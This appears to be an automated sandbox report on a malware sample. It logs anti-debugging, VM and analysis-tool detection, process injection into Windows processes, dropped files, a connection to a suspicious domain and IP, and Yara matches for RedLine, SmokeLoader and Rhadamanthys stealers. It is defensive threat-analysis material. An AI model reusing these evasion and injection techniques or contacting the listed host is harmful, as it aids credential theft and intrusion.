WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystem

Source: C:\Users\user\AppData\Local\Temp\C4AA.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\4434343.dll

Jump to dropped file

Source: C:\Windows\SysWOW64\fontview.exe	Memory allocated: 5170000 memory commit \| memory reserve \| memory write watch
Source: C:\Windows\SysWOW64\fontview.exe	Memory allocated: 5170000 memory commit \| memory reserve \| memory write watch
Source: C:\Windows\SysWOW64\fontview.exe	Memory allocated: 5170000 memory commit \| memory reserve \| memory write watch
Source: C:\Windows\SysWOW64\fontview.exe	Memory allocated: 5170000 memory commit \| memory reserve \| memory write watch

Source: C:\Windows\SysWOW64\fontview.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor

Source: explorer.exe, 00000003.00000000.387586822.000000000830B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000003.00000003.449577540.000000000834F000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&0000006
Source: explorer.exe, 00000003.00000000.384012109.00000000059F0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}b
Source: C4AA.exe, 00000009.00000002.573780441.000000000123A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll8
Source: explorer.exe, 00000003.00000003.449577540.0000000008394000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000003.00000003.453675949.0000000008575000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWG5f(
Source: explorer.exe, 00000003.00000003.450669727.000000000CDE5000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: _VMware_SATA_CD00#5&
Source: C4AA.exe, 00000009.00000002.581264787.0000000002D80000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: DllRegisterServerwkANimhDMAwWV3szQXyvBuPQC78zCscyzexusDvMOYwfSOSysandboxk5iQr5xKkhFi0oixFMGqksOZvxBFcBSxp0cQkIPrNCyQHM3wLlxT6Cdbbs26eSkv7845SwCp2eblGwhvHDTWSogz9U9CgzzsDh2um9tzTcXYzLxsGKNiDiwisTXFFjpshttp://gEKjeGOUdN6i5fBcEs.jOmF6MtoBKl32eAI1QwqxSxpNFyV2sMicrosoft Basic Display AdapterapxALpLEWoMRTxoqbiS5VVQOzJTDWDypDWoJSVZo2QACQsioYxzAfz3u9IKX2BQn6EzzoxJp5PsUZkqmTghzqELr5eG7GRimerCTfOUnCFE4bGUm7h3r60PJIoCTMJ0m%lS\%d.dllQU673JXmPb9xS6blT0XDs1ALT0EJ5hLlaKOwfxnBjFiiOltkI8wpbYDtnFYR40qjP9YSa5NKhRybkS7ixE6tWUfx1eVdsUkhnifax tegawo nip xehN9YxfM4WgP9Yuo5hXPmc4XQ1BZlDjlngvboxtray.exevmwaretray.exewechat.exevmwareuser.exeFiddler.exeprocesshacker.exeqq.exeprocexp.exerdpclip.exeWireshark.exeKawexi gequeci bovoj.exevboxservice.exeVGAuthService.exevmtoolsd.exeprl_cc.exeHTTPDebuggerUI.exeHttpAnalyzerStdV7.exePROCEXP64.exe9vcQbULrEEOHDRqecloudsafelineyq7T94qzPuDeOrTe80urpbYHQ3908aPeycDDggZJIPRjtkOe8J4Wdllbx1ApOW9evbZ1uo2T2UbMGtUdBSQDYJSbaLF5CgvcsFImbSiBECUOLzpcIk2VP28ir0vTy4TbDYVLfRsd5XNE93cYiigvV5kbWQ4w2roU3OQVpirDLVGrVmVTmqRp5j7SuNTW6WJSccDmayghiNoZWAXRSZKcI5fN6d9y9HJRZHIX2jJ5ndQDFLbQ7Gsn9COrx41kruaQxiHNEOIqB1voNhHQfpG6n3LiJpAEsKGQbMh2wfPZkMIH3jpNw2wwL4qOww0SAvLN7QPqaculbYlOPumLDjFmGrxyrkqKoVNJkrD4pQP2PQ8FNc7JabGGRSw4W0K7VSsICQYE9Jt8N0nVh1MITQsnOGZQBxmijylHv2DLczJ486OVC7eHTPLwz4Nt1Dg4jsqGyzCqbMr6MBLZrXjGOxTXcYoA7fBPn0eGH7Ex8dg8NsycsAOGd5g0Nv7r0LVA09KGcaWtJO5Tb2I2LhAGZrMz4T0Epaso079GslJNUY5E4dliUTNFlXFuZSNaEVRrIGWChIYUgq9hHpqOdBLBiAQmME3ZwAAGkEJB4gPxySrtR5EFN43BbtxiTk2KKfog8JcArlOy8gS3rrvRRJNAUFJSzgakwzM2deQ8oCWpzq6o4rIWMrY77FlbkvUsfeYwtpb6Y2CToyPqlwYaqay5DndXG1BsVppP4Jq5WxP1Oq3y3dHBZrc5X4kw1cn7yJdb9J450JE0s2Rdql7gxWP4zkmA4WMYvM2YZr24zUIl8P9x5RU6f5F2Hm4yAEQ4STv1pKj0
Source: fontview.exe, 0000000D.00000003.518946338.0000000005160000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: DisableGuestVmNetworkConnectivity
Source: explorer.exe, 00000003.00000003.450122194.000000000D009000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.453675949.0000000008575000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.453871207.000000000D00E000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000003.00000000.387586822.000000000830B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000000
Source: fontview.exe, 0000000D.00000003.518946338.0000000005160000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: EnableGuestVmNetworkConnectivity

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Source: C:\Users\user\AppData\Local\Temp\C676.exe

Code function: 6_2_00428390 FindFirstFileExW,

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Anti Debugging

Hides threads from debuggers

Source: C:\Windows\SysWOW64\fontview.exe	Thread information set: HideFromDebugger
Source: C:\Windows\SysWOW64\fontview.exe	Thread information set: HideFromDebugger
Source: C:\Windows\SysWOW64\fontview.exe	Thread information set: HideFromDebugger

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Source: C:\Users\user\Desktop\file.exe

System information queried: CodeIntegrityInformation

Source: C:\Users\user\AppData\Roaming\beirutt

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007AF939 push dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\C676.exe	Code function: 6_2_0041E1B1 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\C676.exe	Code function: 6_2_0042950B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\C676.exe	Code function: 6_2_006A8C2B push dword ptr fs:[00000030h]

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\C4AA.exe	Process queried: DebugPort
Source: C:\Windows\SysWOW64\fontview.exe	Process queried: DebugPort
Source: C:\Windows\SysWOW64\fontview.exe	Process queried: DebugPort
Source: C:\Windows\SysWOW64\fontview.exe	Process queried: DebugFlags
Source: C:\Windows\SysWOW64\fontview.exe	Process queried: DebugObjectHandle
Source: C:\Windows\SysWOW64\fontview.exe	Process queried: DebugObjectHandle
Source: C:\Windows\SysWOW64\fontview.exe	Process queried: DebugPort

Source: C:\Users\user\AppData\Local\Temp\C676.exe

Code function: 6_2_00413DCA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

Source: C:\Users\user\AppData\Local\Temp\C676.exe

Code function: 6_2_0042BCAF GetProcessHeap,

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe

Memory allocated: page read and write | page guard

Source: C:\Users\user\AppData\Local\Temp\C676.exe	Code function: 6_2_00414035 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\C676.exe	Code function: 6_2_00413DCA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\C676.exe	Code function: 6_2_00417E53 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\C676.exe	Code function: 6_2_00413F2C SetUnhandledExceptionFilter,
Source: C:\Users\user\AppData\Roaming\beirutt	Code function: 7_2_00408415 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Roaming\beirutt	Code function: 7_2_00407A2B SetUnhandledExceptionFilter,
Source: C:\Users\user\AppData\Roaming\beirutt	Code function: 7_2_0040A6C7 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\AppData\Roaming\beirutt	Code function: 7_2_00406364 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Domain query: potunulit.org
Source: C:\Windows\explorer.exe	Network Connect: 188.114.96.3 80

Benign windows process drops PE files

Source: C:\Windows\explorer.exe

File created: beirutt.3.dr

Jump to dropped file

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\file.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Users\user\Desktop\file.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read

Allocates memory in foreign processes

Source: C:\Users\user\AppData\Local\Temp\C4AA.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe base: 400000 protect: page read and write
Source: C:\Users\user\AppData\Local\Temp\C4AA.exe	Memory allocated: C:\Windows\SysWOW64\fontview.exe base: CD0000 protect: page read and write

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\43D0.exe	Memory written: C:\Users\user\AppData\Local\Temp\43D0.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\C4AA.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\C4AA.exe	Memory written: C:\Windows\SysWOW64\fontview.exe base: CD0000 value starts with: 4D5A

Creates a thread in another existing process (thread injection)

Source: C:\Users\user\Desktop\file.exe

Thread created: C:\Windows\explorer.exe EIP: 4601B14

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Temp\C4AA.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\C4AA.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe base: 11C1008
Source: C:\Users\user\AppData\Local\Temp\C4AA.exe	Memory written: C:\Windows\SysWOW64\fontview.exe base: CD0000

Source: C:\Users\user\AppData\Local\Temp\43D0.exe	Process created: C:\Users\user\AppData\Local\Temp\43D0.exe C:\Users\user\AppData\Local\Temp\43D0.exe
Source: C:\Users\user\AppData\Local\Temp\C4AA.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe
Source: C:\Users\user\AppData\Local\Temp\C4AA.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe
Source: C:\Users\user\AppData\Local\Temp\C4AA.exe	Process created: C:\Windows\SysWOW64\fontview.exe C:\Windows\SYSWOW64\fontview.exe

Source: explorer.exe, 00000003.00000000.375412893.0000000000E50000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: EProgram Managerzx
Source: fontview.exe, 0000000D.00000003.543911919.00000000064F0000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.541667280.0000000005177000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ShellFileViewFolderExploreFolderConfirmCabinetIDDeleteGroupDeleteItemReplaceItemReloadFindFolderOpenFindFileCreateGroupShowGroupAddItemExitProgman[RN
Source: fontview.exe, 0000000D.00000003.543911919.00000000064F0000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.541667280.0000000005177000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %c:\%sExplorerDMGFrameGroupssetupPmFrameGetIconGetDescriptionGetWorkingDirSoftware\Microsoft\Windows\CurrentVersion\Explorer\MapGroupsSenderCA_DDECLASSInstallMake Program Manager GroupStartUpccInsDDEBWWFrameDDEClientWndClassBACKSCAPEMediaRecorderMedia Recorder#32770DDEClientddeClassgroups
Source: fontview.exe, 0000000D.00000003.529256728.0000000004C40000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000003.00000000.387586822.000000000834F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.449577540.000000000834F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.375412893.0000000000E50000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: fontview.exe, 0000000D.00000003.528194183.0000000005170000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.527333609.0000000004C49000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: GetProgmanWindow
Source: explorer.exe, 00000003.00000000.375412893.0000000000E50000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: fontview.exe, 0000000D.00000003.543911919.00000000064F0000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.541667280.0000000005177000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: PreviewMetadataLabelPreviewMetadataSpacerPreviewEditMetadataPreviewMetadataControlIconLayoutsWorkAreaChangeActivityPreviewMetadataRowAddRemoveAppBarShell_TrayWndhomepagetasklinktasklinkTaskSearchTexttasks%s
Source: explorer.exe, 00000003.00000000.375241968.00000000009C8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Progmanath
Source: fontview.exe, 0000000D.00000003.529256728.0000000004C40000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: *Program ManagerpszDesktopTitleWSoftware\Classes\
Source: fontview.exe, 0000000D.00000003.543911919.00000000064F0000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.541667280.0000000005177000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: animationTileContentsSrcVerticalScrollBaranimationProgressSrcanimationTileContentsDstInneranimationTileContentsSrcInneranimationTileContentsDstanimationProgressDstInneranimationProgressDstanimationProgressSrcInnereltRegularTileHeadereltSummaryeltInterruptPaneeltProgressBaridOperationTileeltInterruptDoForAlleltItemIconeltInterruptDescriptioneltInterruptButtonsContainereltInterruptDeleteBtneltInterruptElevateBtneltItemPropseltItemNameeltInterruptYesBtneltInterruptRetryBtneltInterruptCancelBtneltInterruptSkipBtnConfirmationCheckBoxDoForAlleltInterruptNoBtneltInterruptOKBtnshell\shell32\operationstatusmgr.cppidTileSubTextidOperationInterrupteltInterruptDoForAllLabelidTileActionIdTileKeepSourceidItemTileIdTileDecideForEachIdTileIgnoreIdTileKeepAsPersonalIdTileKeepAsWorkIdTileKeepDestCustomCommandIconDecideForEachTileIconSkipTileIconKeepSourceTileIconeltItemTileContainereltConflictInterruptDescriptionidTileIconidCustomConflictInterrupteltInterruptTileHeaderidConflictInterrupteltRateChartCHARTVIEW%0.2fIdTileDefaulteltPauseButtoneltTileContentseltTile%ueltTimeRemainingeltConflictInterrupteltConfirmationInterrupteltLocationseltItemsRemainingeltDetailseltScrolleltRegularTileeltCancelButtonidTileHosteltScrollBarFillereltDividereltProgressBarContainereltDisplayModeBtnFocusHoldereltDisplayModeBtnWindows.SystemToast.ExplorerEnthusiastModeprogmaneltFooterArealfEscapementSoftware\Microsoft\NotepadRICHEDIT50WlfUnderlinelfItaliclfWeightlfOrientationlfClipPrecisionlfOutPrecisionlfCharSetlfStrikeOutLucida ConsoleiPointSizelfPitchAndFamilylfQualitylfFaceName
Source: fontview.exe, 0000000D.00000003.537869173.0000000004CD0000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.535582414.0000000004C45000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWndSHCore.Subclass.DataSystem\CurrentControlSet\Control\HvsiWindowOverrideScaleFactorSoftware\Microsoft\Windows\CurrentVersion\Explorer\FCM\Impolite[
Source: fontview.exe, 0000000D.00000003.541667280.0000000005177000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ImageList_CoCreateInstanceProgmanProgram Managercomctl32.dllImageList_ReplaceIconImageList_CreateImageList_Destroy
Source: fontview.exe, 0000000D.00000003.543911919.00000000064F0000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.541667280.0000000005177000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \|}TFoldersAppPropertiesShell*ProgmanProgmanPROGMANSoftware\Microsoft\Windows\CurrentVersion\PoliciesPolicyAutoColorizationHandleAssociationChange
Source: explorer.exe, 00000003.00000000.375412893.0000000000E50000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: fontview.exe, 0000000D.00000003.528194183.0000000005170000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.527333609.0000000004C49000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SetProgmanWindow
Source: fontview.exe, 0000000D.00000003.529256728.0000000004C40000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: RtlDllShutdownInProgress_p0.System......./UseSystemForSystemFoldersSoftware\Microsoft\Windows\CurrentVersion\Explorerdesktop.ini%APPDATA%%USERPROFILE%%ALLUSERSPROFILE%%ProgramFiles%%SystemRoot%%SystemDrive%\\%COMPUTERNAME%...\...PATH.exe.lnk.cmd.bat.com.pifCutListSoftware\Microsoft\Windows\CurrentVersion\Explorer\FileAssociation\VarFileInfo\Translation\StringFileInfo\%04X%04X\FileDescription\StringFileInfo\040904E4\FileDescription\StringFileInfo\04090000\FileDescriptionProgram ManagerpszDesktopTitleW%%%s%%%sUSERPROFILEProgramFilesSystemRootSystemDrivewindir"%1"commandshellSoftware\classesDefaultIconshell\%sAssignmentType0Software\Classes\Applications\%sSoftware\Classes\Applications%1.ade.adp.app.asp.cer.chm.cnt.crt.csh.der.fxp.gadget.grp.hlp.hpj.inf.ins.isp.its.js.jse.ksh.mad.maf.mag.mam.maq.mar.mas.mat.mau.mav.maw.mcf.mda.mdb.mde.mdt.mdw.mdz.msc.msh.msh1.msh1xml.msh2.msh2xml.mshxml.msp.mst.msu.ops.pcd.pl.plg.prf.prg.printerexport.ps1.ps1xml.ps2.ps2xml.psc1.psc2.psd1.psm1.pst.scf.sct.shb.shs.theme.tmp.url.vbe.vbp.vbs.vhd.vhdx.vsmacros.vsw.webpnp.ws.wsc.wsf.wsh.xnkHKCU:HKLM:HKCR:%s\shell\%s\commandshell\%s\commandSoftware\Clients\%sSoftware\Clients\%s\%sOpen.*....../UseSystemForSystemFoldersdesktop.ini%SystemDrive%\\%COMPUTERNAME%...\...%s\%s\StringFileInfo\04090000\FileDescriptionT

Source: C:\Users\user\AppData\Local\Temp\C676.exe	Code function: GetACP,IsValidCodePage,GetLocaleInfoW,
Source: C:\Users\user\AppData\Local\Temp\C676.exe	Code function: EnumSystemLocalesW,
Source: C:\Users\user\AppData\Local\Temp\C676.exe	Code function: EnumSystemLocalesW,
Source: C:\Users\user\AppData\Local\Temp\C676.exe	Code function: EnumSystemLocalesW,
Source: C:\Users\user\AppData\Local\Temp\C676.exe	Code function: GetLocaleInfoW,
Source: C:\Users\user\AppData\Local\Temp\C676.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,
Source: C:\Users\user\AppData\Local\Temp\C676.exe	Code function: GetLocaleInfoW,
Source: C:\Users\user\AppData\Local\Temp\C676.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,
Source: C:\Users\user\AppData\Local\Temp\C676.exe	Code function: GetLocaleInfoW,
Source: C:\Users\user\AppData\Local\Temp\C676.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
Source: C:\Users\user\AppData\Local\Temp\C676.exe	Code function: EnumSystemLocalesW,
Source: C:\Users\user\AppData\Roaming\beirutt	Code function: GetLocaleInfoA,

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\C676.exe

Code function: 6_2_00413A75 cpuid

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Source: C:\Users\user\AppData\Local\Temp\C676.exe

Code function: 6_2_00413CC0 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

Source: C:\Users\user\AppData\Local\Temp\C676.exe

Code function: 6_2_004041D0 SHGetFolderPathA,GetModuleFileNameA,GetComputerNameA,GetUserNameA,

Stealing of Sensitive Information

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 9.3.C4AA.exe.df30000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.3.C4AA.exe.df30000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.C4AA.exe.12a0ed0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.3.C4AA.exe.df30000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.ngentask.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.C4AA.exe.12a0ed0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.572420134.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.485078968.000000000DF30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.490022034.000000000DF32000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.573780441.000000000128B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.581410374.00000000033E6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ngentask.exe PID: 4292, type: MEMORYSTR

Yara detected SmokeLoader

Source: Yara match	File source: 00000000.00000002.397037744.00000000005F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.397025095.00000000005D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected RHADAMANTHYS Stealer

Source: Yara match	File source: 0000000D.00000003.510365391.0000000003056000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.573423971.0000000004AD0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 9.3.C4AA.exe.df30000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.3.C4AA.exe.df30000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.C4AA.exe.12a0ed0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.3.C4AA.exe.df30000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.ngentask.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.C4AA.exe.12a0ed0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.572420134.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.485078968.000000000DF30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.490022034.000000000DF32000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.573780441.000000000128B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.581410374.00000000033E6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ngentask.exe PID: 4292, type: MEMORYSTR

Yara detected SmokeLoader

Source: Yara match	File source: 00000000.00000002.397037744.00000000005F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.397025095.00000000005D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected RHADAMANTHYS Stealer

Source: Yara match	File source: 0000000D.00000003.510365391.0000000003056000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.573423971.0000000004AD0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	121 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	21 Input Capture	1 System Time Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	3 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	3 Native API	Boot or Logon Initialization Scripts	612 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	21 Input Capture	Exfiltration Over Bluetooth	11 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	1 Exploitation for Client Execution	Logon Script (Windows)	Logon Script (Windows)	31 Obfuscated Files or Information	Security Account Manager	1 File and Directory Discovery	SMB/Windows Admin Shares	2 Clipboard Data	Automated Exfiltration	1 Non-Standard Port	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	2 Command and Scripting Interpreter	Logon Script (Mac)	Logon Script (Mac)	22 Software Packing	NTDS	146 System Information Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	4 Non-Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	551 Security Software Discovery	SSH	Keylogging	Data Transfer Size Limits	115 Application Layer Protocol	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 File Deletion	Cached Domain Credentials	25 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	11 Masquerading	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
